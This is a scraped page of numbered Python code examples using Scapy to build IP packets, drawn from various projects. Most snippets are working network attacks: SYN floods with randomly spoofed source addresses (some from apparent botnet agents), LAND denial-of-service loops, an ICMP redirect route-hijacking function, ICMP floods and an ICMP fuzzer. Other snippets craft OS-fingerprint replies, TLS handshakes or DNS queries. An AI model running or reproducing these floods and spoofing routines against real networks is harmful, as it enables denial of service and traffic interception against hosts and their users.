示例#1
0
def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute):
    """Try ICMP Redirect attack

    Args:
        ip_gw (str): Gateway IP
        ip_victim (str) : Target/Victim IP
        ip_attacker (str) : Attacker IP
        ip_targetroute (str) : IP of network to reach in ICMP payload

        interface ???
    """

    ip = IP()
    ip.src = ip_gw
    ip.dst = ip_victim

    icmp = ICMP()
    icmp.type = 5
    icmp.code = 1
    icmp.gw = ip_attacker

    ip2 = IP()
    ip2.src = ip_victim
    ip2.dst = ip_targetroute

    icmp2 = ICMP()
    icmp2.type = 0
    icmp2.code = 0

    # Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets.
    send(ip / icmp / ip2 / icmp2, iface="eth1")
示例#2
0
文件: agent.py 项目: pcaro90/Ares
            def run(self):
                # Damn, ugly!
                global forging

                if forging:
                    i = IP()
                    i.dst = ip
                    if spoofing:
                        i.src = '.'.join(
                            random.randint(1, 254) for _ in range(4))

                    t = TCP()
                    t.sport = random.randint(1, 65535)
                    t.dport = port
                    t.flags = 'S'

                    try:
                        send(i / t, verbose=0)
                    except PermissionError:
                        print('ohno, not forging')
                        forging = False

                else:
                    s = socket.socket()
                    s.connect((self.ip, self.port))
示例#3
0
def cmd_land(ip, count, port, iface, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#4
0
def service_craft(pkt, fp, mac, service, type_=False):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.ttl, 16)
    ip.flags = 0x4000

    tcp = TCP()
    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    if type_:
        tcp.flags = 0x018  # PSH / ACK
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].ack
        data = service[pkt[TCP].dport]
        fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
        return fin_pkt
    else:
        tcp.flags = 0x012  # SYN / ACK
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].seq + 1
        fin_pkt = ip / tcp if ether is None else ether / ip / tcp
        return fin_pkt
示例#5
0
文件: icmpflood.py 项目: sfluo/Mr.Bot
	def run(self):
		print "Starting %s %s %d" % (self.name, self.target, self.port)
		i = IP() 
		i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254))
		i.dst = self.target
		t = ICMP()
		print "Spoofing %s to send ICMP ..." % i.src
		sr1(i/ICMP,verbose=0)
示例#6
0
def doSynFlood(origin_ip=None, origin_port=None, 
        target_ip=None, target_port=None, 
        interface=None, duration=None, gap=0):
    '''
    Starts Syn Flood attacks

    Arguments:
        origin_ip (str): attacker ip
        origin_port (int): attacker port
        target_ip (str): target ip
        target_port (int): target port
        interface (str): network interface to use
        duration (int): duration of the attack
        gap (int): gap (delay) between packets

    Returns:
        None
    '''
    
    # Check if everything is filled out
    if target_ip is None:
        return
    if target_port is None:
        return
    if duration is None:
        return
    if gap >= duration:
        return

    # Prepare the packet
    ip_layer = IP()
    ip_layer.src = origin_ip
    ip_layer.dst = target_ip

    tcp_layer = TCP()	
    tcp_layer.sport = origin_port
    tcp_layer.dport = target_port
    tcp_layer.flags = "S"


    # Prepare timings
    time_start = time()
    time_end = time_start + duration


    # Start attack
    while (time() <= time_end): #duration

        # Constantly changing values
        tcp_layer.seq = GenerateRandomSafeSeq()
        tcp_layer.ack = GenerateRandomSafeSeq()
        tcp_layer.window = GenerateRandomWindow()

        attack_packet = ip_layer/tcp_layer # packet to send

        send(attack_packet, iface=interface)
        if gap > 0:
            sleep(gap) #gap
示例#7
0
def seqgen_pkt_craft(pkt, fp, mac, pno):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['T1']['TTL'], 16)
    ip.flags = fp.probe['T1']['DF']
    ip.id = fp.ip_id_gen()

    tcp = TCP()

    s_val = fp.probe['T1']['S']
    if s_val == 'Z':
        tcp.seq = 0
    elif s_val == 'A':
        tcp.seq = pkt[TCP].ack
    elif s_val == 'A+':
        tcp.seq = pkt[TCP].ack + 1
    else:
        tcp.seq = fp.tcp_seq_gen()

    a_val = fp.probe['T1']['A']
    if a_val == 'Z':
        tcp.ack = 0
    elif a_val == 'S':
        tcp.ack = pkt[TCP].seq
    elif a_val == 'S+':
        tcp.ack = pkt[TCP].seq + 1
    else:
        tcp.ack = pkt[TCP].seq + 369

    flag_val = fp.probe['T1']['F']
    tcp.flags = flag_val

    tcp.window = fp.probe['WIN']['W' + pno]

    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    tcp.options = fp.probe['OPS']['O' + pno]

    rd_val = fp.probe['T1']['RD']
    if rd_val != '0':
        crc = int(rd_val, 16)
        data = b'TCP Port is closed\x00'
        data += compensate(data, crc)
        fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data

    else:
        fin_pkt = ip / tcp if ether is None else ether / ip / tcp
    return fin_pkt
示例#8
0
 def run(self):
     print "Starting %s %s %d" % (self.name, self.target, self.port)
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
         1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = self.target
     t = ICMP()
     print "Spoofing %s to send ICMP ..." % i.src
     sr1(i / ICMP, verbose=0)
示例#9
0
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many
    packets send with the '-c' option. The default is never stop. Also, you
    can specify the destination port, with the '-p' option.
    """

    conf.verb = False

    if iface:
        iface = search_iface(iface)
        if iface:
            conf.iface = iface['name']
        else:
            logging.error(
                'Interface {} not found. Use habu.interfaces to show valid network interfaces'
                .format(iface))
            return False

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#10
0
文件: synspoof.py 项目: sfluo/Mr.Bot
	def run(self):
		print "Starting %s %s %d" % (self.name, self.target, self.port)
		i = IP() 
		i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254))
		i.dst = self.target
		t = TCP()
		t.dport = self.port
		t.flags='S'	
		print "Spoofing %s to send SYN ..." % i.src
		sr1(i/t,verbose=0)
示例#11
0
 def syn_flood(self, target, port):
     from scapy.all import IP, TCP, send
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = target
     t = TCP()
     t.sport = random.randint(1, 65500)
     t.dport = port
     t.flags = 'S'
     send(i / t, verbose=0)
示例#12
0
def udp_craft(pkt, mac, fp):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['U1']['TTL'], 16)
    ip.flags = fp.probe['U1']['DF']
    ip.len = 56
    ip.id = 4162

    icmp = ICMP()
    icmp.type = 3
    icmp.unused = 0
    icmp.code = 13  # code 3 for reply

    iperror = IPerror()
    iperror.proto = 'udp'
    iperror.ttl = 0x3E
    iperror.len = fp.probe['U1']['RIPL']
    iperror.id = fp.probe['U1']['RID']

    ripck_val = fp.probe['U1']['RIPCK']
    if ripck_val == 'G':
        pass
    elif ripck_val == 'Z':
        iperror.chksum = 0
    else:
        iperror.chksum = pkt[IP].chksum

    udperror = UDPerror()
    udperror.sport = pkt[UDP].sport
    udperror.dport = pkt[UDP].dport
    udperror.len = pkt[UDP].len
    if fp.probe['U1']['RUCK'] == 'G':
        udperror.chksum = pkt[UDP].chksum
    else:
        udperror.chksum = fp.probe['U1']['RUCK']

    try:
        ipl = int(fp.probe['U1']['IPL'], 16)
    except KeyError:
        ipl = None

    data = pkt[Raw].load

    fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data

    return fin_pkt
示例#13
0
 def run(self):
     print "Starting %s %s %d" % (self.name, self.target, self.port)
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
         1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = self.target
     t = TCP()
     t.dport = self.port
     t.flags = 'S'
     print "Spoofing %s to send SYN ..." % i.src
     sr1(i / t, verbose=0)
示例#14
0
    def run(self):
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = self.target

        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = self.port
        t.flags = 'S'

        send(i / t, verbose=0)
    def run(self):
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
            1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = target

        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = port
        t.flags = 'S'

        send(i/t, verbose=0)
示例#16
0
    def run(self):
        packet_ip = IP()
        packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
                                             random.randint(1, 254),
                                             random.randint(1, 254),
                                             random.randint(1, 254))
        packet_ip.dst = self.host

        packet_tcp = TCP()
        packet_tcp.sport = random.randint(1024, 65535)
        packet_tcp.dport = self.port
        packet_tcp.flags = 'S'

        send(packet_ip/packet_tcp)
示例#17
0
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many
    packets send with the '-c' option. The default is never stop. Also, you
    can specify the destination port, with the '-p' option.
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#18
0
def ecn_craft(pkt, mac, fp):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['ECN']['TTL'], 16)

    ip_flag = fp.probe['ECN']['DF']
    if ip_flag == 'Y':
        ip.flags = 2
    else:
        ip.flags = 0
    ip.id = fp.ip_id_gen()

    tcp = TCP()
    w_val = fp.probe['ECN']['W']
    if w_val == 'ECHOED':
        tcp.window = pkt[TCP].window
    else:
        tcp.window = w_val
    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    cc_val = fp.probe['ECN']['CC']
    if cc_val == 'Y':
        tcp.flags = 0x52
    elif cc_val == 'N':
        tcp.flags = 0x12
    elif cc_val == 'S':
        tcp.flags = 0xD2
    else:
        tcp.flags = 0x10

    o_val = fp.probe['ECN']['O']
    if o_val == 'EMPTY':
        pass
    else:
        tcp.options = o_val

    fin_pkt = ip / tcp if ether is None else ether / ip / tcp

    return fin_pkt
示例#19
0
def IP_layer(attributes):
    layer3 = IP()
    layer3.version = attributes['version']
    layer3.ihl = attributes['ihl']
    layer3.tos = attributes['tos']
    layer3.len = attributes['len']
    layer3.id = attributes['id']
    layer3.flags = attributes['flags']
    layer3.frag = attributes['frag']
    layer3.ttl = attributes['ttl']
    layer3.proto = attributes['proto']
    layer3.src = attributes['src']
    layer3.dst = attributes['dst']

    return layer3
示例#20
0
def three_way_handshake(ip_dst, sniffer, port_num):
    ip = IP(ttl=255)
    ip.src = MY_IP
    ip.dst = ip_dst

    tcp = TCP(
        sport=port_num,
        dport=443,
        flags='S',
        seq=1000,
        window=65535,
        options=[("MSS", MSS_SIZE), ('WScale', 10)])

    SYNACK = sr1(ip / tcp, verbose=False, timeout=2)
    if not SYNACK:
        return "NOSYNACK"

    tls = TLSRecord() / TLSHandshakes(handshakes=[
        TLSHandshake() / TLSClientHello(
            compression_methods=list(range(0xff))[::-1],
            cipher_suites=list(range(0xff)))
    ])

    tls_raw = str(tls)
    ptr = 0
    current_ack = SYNACK.ack

    if SYNACK.seq is None:
        return "SYNACKERROR"

    while ptr < len(tls_raw):
        ACK = TCP(
            sport=port_num,
            dport=443,
            flags='A',
            seq=current_ack,
            ack=SYNACK.seq + 1,
            window=65535,
            options=[("MSS", MSS_SIZE), ('WScale', 10)])

        tls_frag = tls_raw[ptr:ptr + MSS_SIZE]
        send(ip / ACK / tls_frag, verbose=False)
        ptr += MSS_SIZE
        current_ack += len(tls_frag)

    sniffer.client_hello_sent = True

    return "SUCCESS"
示例#21
0
def source_fix(dummy, this_packet):
    """
    Called when a PnPIPsec message arrives to handle the message.
    """
    print "source_fix"
    # parse the message and its type
    pkt = IP(this_packet.get_data())
    #print "+++++++++++++++++++++++++++++++++"
    #print pkt.show()
    #print "+++++++++++++++++++++++++++++++++"
    #print "---------------------------------"
    if (type(pkt[TCP].payload) is not packet.NoPayload):
        response = pickle.loads(str(pkt[TCP].payload))
        print "changing source to ", response.real_src
        print dir(pkt)
        pkt.src = response.real_src
    this_packet.set_verdict(nfqueue.NF_ACCEPT)
示例#22
0
    def start(self):
        """Creats the SYN packets and sends it continuously to the target ports"""

        # Create the IP layer
        ip = IP(dst=self.target_ipv4)
        if (self.spoof_ip is not None):
            ip.src = self.spoof_ip

        # Create the SYN
        tcp = TCP(sport=RandShort(),
                  dport=self.target_ports,
                  flags="S",
                  seq=42)

        print("[*] SYN flood Started")

        # Continously send SYNs to the target ports
        send(ip / tcp, verbose=False, loop=True)
示例#23
0
def sendSYN(host, port):
    # Create an IP Packet using random ip as source and the target IP as destination
    ipPacket = IP()
    ipPacket.src = ".".join(
        map(str, (random.randint(0, 255) for i in range(4))))
    ipPacket.dst = host

    # Create a TCP segment using a random source port and the target port as the destination
    tcpSegment = TCP()
    tcpSegment.sport = random.randint(1000, 65535)
    tcpSegment.dport = port

    # Set the syn flag
    tcpSegment.flags = 'S'

    # Send the composition of the two (package/segment) and ignore the result
    send(ipPacket / tcpSegment, verbose=0)
    pass
示例#24
0
文件: syn.py 项目: mariklolik/Impulse
def flood(target):
	IP_Packet = IP()
	IP_Packet.src = randomData.random_IP()
	IP_Packet.dst = target[0]

	TCP_Packet = TCP()
	TCP_Packet.sport = random.randint(1000, 10000)
	TCP_Packet.dport = target[1]
	TCP_Packet.flags = "S"
	TCP_Packet.seq = random.randint(1000, 10000)
	TCP_Packet.window = random.randint(1000, 10000)

	for _ in range(16):
		try:
			send(IP_Packet / TCP_Packet, verbose = False)
		except Exception as e:
			print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
		else:
			print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
示例#25
0
def syn_flood(ip_destination, port_destination, limit):
    total = 0
    print("Enviando Pacotes")
    for x in range(0, limit):
        ip_packet = IP()
        ip_packet.src = ".".join(
            map(str, (random.randint(0, 255) for _ in range(4))))
        ip_packet.dst = ip_destination

        tcp_packet = TCP()
        tcp_packet.sport = random.randint(1000, 9000)
        tcp_packet.dport = port_destination
        tcp_packet.flags = "S"
        tcp_packet.seq = random.randint(1000, 9000)
        tcp_packet.window = random.randint(1000, 9000)

        print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
        send(ip_packet / tcp_packet, verbose=0)
        total += 1
    print("All packets sent")
示例#26
0
def icmp_craft(pkt, fp, mac):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['IE']['TTL'], 16)
    dfi_flag = fp.probe['IE']['DFI']
    if dfi_flag == 'N':
        ip.flags = 0
    elif dfi_flag == 'S':
        ip.flags = pkt[IP].flags
    elif dfi_flag == 'Y':
        ip.flags = 2
    else:
        ip.flags = 0 if pkt[IP].flags == 2 else 2

    ip.id = fp.ip_id_icmp_gen()
    icmp = ICMP()
    icmp.type = 0
    icmp.id = pkt[ICMP].id

    cd_val = fp.probe['IE']['CD']
    if cd_val == 'Z':
        icmp.code = 0
    elif cd_val == 'S':
        icmp.code = pkt[ICMP].code
    else:
        icmp.code = random.randint(0, 15)

    icmp.seq = pkt[ICMP].seq
    data = pkt[ICMP].payload

    fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data
    return fin_pkt
示例#27
0
def flood(target):
    IP_Packet = IP()
    IP_Packet.src = random_IP()
    IP_Packet.dst = target[0]

    TCP_Packet = TCP()
    TCP_Packet.sport = random.randint(1000, 10000)
    TCP_Packet.dport = target[1]
    TCP_Packet.flags = "S"
    TCP_Packet.seq = random.randint(1000, 10000)
    TCP_Packet.window = random.randint(1000, 10000)

    for _ in range(16):
        try:
            send(IP_Packet / TCP_Packet, verbose=False)
        except Exception as e:
            print(f"[{red} bold][✘] ERROR[/{red} bold] " +
                  f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
        else:
            print(f"[{green}][✔] SUCCESS[/{green}] " +
                  f"[{yellow}]SYN packet sent to[{yellow}] " +
                  f"[{blue}]{'{}:{}'.format(*target)}")
示例#28
0
def main(args):
    print "[*] Comenzando el fuzzing..."

    pkt_lst = []

    for i in xrange(args.count):

        ip_layer = IP(dst=args.target)

        # Fuzz IP layer
        #
        #  Src ramdon?
        if random_bool():
            ip_layer.src = str(RandIP())
        # IP ID
        if random_bool():
            ip_layer.id = int(RandShort())
        # IP TTL
        if random_bool():
            ip_layer.ttl = int(RandInt()) % 255

        icmp_layer = ICMP()

        # Fuzz ICMP layer
        #
        #  Type random
        if random_bool():
            icmp_layer.type = int(RandByte())
        #  Seq random
        if random_bool():
            icmp_layer.seq = int(RandShort())

        pkt = ip_layer/icmp_layer

        pkt_lst.append(pkt)

    sendp(pkt_lst, inter=args.interval)

    print "[*] Enviado %s paquetes" % i
示例#29
0
文件: syn.py 项目: Marshmello1912/Git
    def syn_flood():
        global FINISH
        while True:
            if FINISH:
                break

            IP_Packet = IP()
            IP_Packet.src = randomData.random_IP()
            IP_Packet.dst = target_ip

            TCP_Packet = TCP()
            TCP_Packet.sport = random.randint(1000, 10000)
            TCP_Packet.dport = target_port
            TCP_Packet.flags = "S"
            TCP_Packet.seq = random.randint(1000, 10000)
            TCP_Packet.window = random.randint(1000, 10000)
            try:
                send(IP_Packet / TCP_Packet, verbose=False)
            except Exception as e:
                print(e)
            else:
                print("[+] SYN packet sent!")
示例#30
0
def flood(target):
    IP_Packet = IP()
    IP_Packet.src = random_IP()
    IP_Packet.dst = target[0]

    TCP_Packet = TCP()
    TCP_Packet.sport = random.randint(1000, 10000)
    TCP_Packet.dport = target[1]
    TCP_Packet.flags = "S"
    TCP_Packet.seq = random.randint(1000, 10000)
    TCP_Packet.window = random.randint(1000, 10000)

    for _ in range(16):
        try:
            send(IP_Packet / TCP_Packet, verbose=False)
        except Exception as e:
            print(
                f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
            )
        else:
            print(
                f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
            )
示例#31
0
])
for arg, opts in args.items():
    p.add_argument(arg, **opts)

if __name__ == "__main__":
    args = p.parse_args()

    count = 0

    try:
        if args.dest_ip in ("127.0.0.1", "localhost"):
            conf.L3socket = L3RawSocket

        ip = IP(dst=args.dest_ip)
        if args.source_ip is not None:
            ip.src = args.source_ip

        udp = UDP(dport=args.port)

        if args.incr_seq:
            seq = args.seq_number

            if args.loop:
                while True:
                    pkt = ip/udp/(
                        PACKET_FORMAT % (args.rfid_tag, args.direction, seq))
                    send(pkt)
                    count += 1
                    seq += 1
            else:
                i = 0
示例#32
0
def configureIP(ip):
    IP_Packet = IP()
    IP_Packet.src = randomIP()
    IP_Packet.dst = ip

    return IP_Packet
示例#33
0
#!/usr/bin/python
from scapy.all import IP, TCP

a = IP()
a.src = "1.2.3.4"
a.dst = "10.0.2.15"
a.ihl = 5
b = TCP()
b.sport = 1551
b.dport = 23
b.seq = 1551
b.flags = 'S'

pkt = a/b

with open("packet", "wb") as f:
    f.write(bytes(pkt))
示例#34
0
#/usr/bin/python

from scapy.all import IP, UDP, DNS, DNSQR, send

# Get all input about DNS package.
destination_input = str(raw_input('What is your DNS server which you want to resolve from? :: '))
source_input = str(raw_input('What is your source ip address which you want to send DNS request from? :: '))
query_input = str(raw_input('What is the address which will be queried by DNS server? :: '))

# Create ip, udp and dns packages.
i = IP(dst=destination_input)
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))

# Print all information.
print ""
print "Information"
print "==========="
print "Source IP     : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query     : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
print i.show()
print ""
print u.show()
print ""
print d.show()
示例#35
0
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])

data = "blahblahblah"
# define ip and icmp
eth = Ether()
eth.src=SRC_MAC
eth.dst=DST_MAC
ip = IP()
ip.src = SRC_IP
ip.dst = DST_IP
icmp = ICMP()
icmp.type = 8
icmp.code = 0

finished = 0
count = 0
while not finished:
    sendp(eth/ip/icmp/data, iface=IF_NAME)
    time.sleep(REPEAT_INTERVAL)
    count += 1
    if count >= REPEAT_COUNT:
        finished = 1
示例#36
0
def t2tot7_craft(pkt, fp, mac, tno):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe[tno]['TTL'], 16)
    ip.flags = fp.probe[tno]['DF']
    ip.id = random.randint(1, 1000)

    tcp = TCP()

    s_val = fp.probe[tno]['S']
    if s_val == 'Z':
        tcp.seq = 0
    elif s_val == 'A':
        tcp.seq = pkt[TCP].ack
    elif s_val == 'A+':
        tcp.seq = pkt[TCP].ack + 1
    else:
        tcp.seq = pkt[TCP].ack + 369

    a_val = fp.probe[tno]['A']
    if a_val == 'Z':
        tcp.ack = 0
    elif a_val == 'S':
        tcp.ack = pkt[TCP].seq
    elif a_val == 'S+':
        tcp.ack = pkt[TCP].seq + 1
    else:
        tcp.ack = pkt[TCP].seq + 369

    flag_val = fp.probe[tno]['F']
    tcp.flags = flag_val

    w_val = fp.probe[tno]['W']
    if w_val == 'ECHOED':
        tcp.window = pkt[TCP].window
    else:
        tcp.window = w_val

    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    o_val = fp.probe[tno]['O']
    if o_val == 'EMPTY':
        pass
    else:
        tcp.options = o_val

    rd_val = fp.probe[tno]['RD']
    if rd_val != '0':
        crc = int(rd_val, 16)
        data = b'TCP Port is closed\x00'
        data += compensate(data, crc)
        fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
    else:
        fin_pkt = ip / tcp if ether is None else ether / ip / tcp

    return fin_pkt
示例#37
0
        ip_source[index] = ""

print(ip_source)
print(ip_dest)

ip_header.version = 4
ip_header.ihl = ip_hdr_len // 4
ip_header.tos = 0x0
ip_header.len = (ip_hdr_len + udp_pkt_len)
ip_header.id = 0
ip_header.flags = 0
ip_header.frag = 0
ip_header.ttl = 64
ip_header.proto = 17
#ip_header.chksum= 0x7ce6
ip_header.src = ip_src
ip_header.dst = ip_dst
del ip_header.chksum
ip_header = ip_header.__class__(str(ip_header))

#ip_header.show2()
#print("-------------------------------------")
#hexdump((ip_header.version << 4) | ip_header.ihl)
#print(ip_header.version << 4)
#print(ip_header.ihl)
#print(ip_header.proto)
#hexdump(ip_header)

#ip_pkt_len = ip_hdr_len + udp_pkt_len
#ip_version = 4
#ip_ihl = ip_hdr_len // 4